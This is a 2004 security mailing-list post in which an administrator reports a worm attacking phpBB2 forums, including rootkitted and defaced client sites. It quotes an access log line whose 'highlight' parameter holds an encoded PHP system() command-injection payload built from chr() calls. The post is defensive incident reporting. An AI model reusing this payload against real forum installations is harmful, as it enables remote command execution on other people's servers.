Security Incidents mailing list archives

Worm hitting PHPbb2 Forums

From: "L. Walker" <lwalker () magi net au>
Date: Tue, 21 Dec 2004 20:23:11 +1100 (EST)

Just spotted two clients hit by this.  One client didnt update his
software (PHP 4.3.4, Apache 1.3.22) and was rootkitted by generation 16. 
Chkrootkit says its Adore, however could be something else.  Datacenter
wasn't very smart and has since wiped the server, so no binaries or other
evidence.

Generation 12 only wiped out PHP files, replacing them with its own
message on other client's PHPbb2 forum.  Access logs show:

66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET
/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527
HTTP/1.0" 200 270
"http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

--
L. Walker <lwalker at magi dot net dot au>
Network Administrator / Consultant
--

Current thread:

Worm hitting PHPbb2 Forums L. Walker (Dec 21)
- Re: Worm hitting PHPbb2 Forums mark (Dec 21)
- Re: Worm hitting PHPbb2 Forums Chris Ess (Dec 21)
  - Re: Worm hitting PHPbb2 Forums lists (Dec 21)
    - Re: Worm hitting PHPbb2 Forums Chris Ess (Dec 21)
    - Re: Worm hitting PHPbb2 Forums lists (Dec 21)
    - Re: Worm hitting PHPbb2 Forums Barrie Dempster (Dec 21)
- <Possible follow-ups>
- RE: Worm hitting PHPbb2 Forums Christopher Adickes (Dec 21)
- RE: Worm hitting PHPbb2 Forums Mike (Dec 21)
  - RE: Worm hitting PHPbb2 Forums M. Shirk (Dec 22)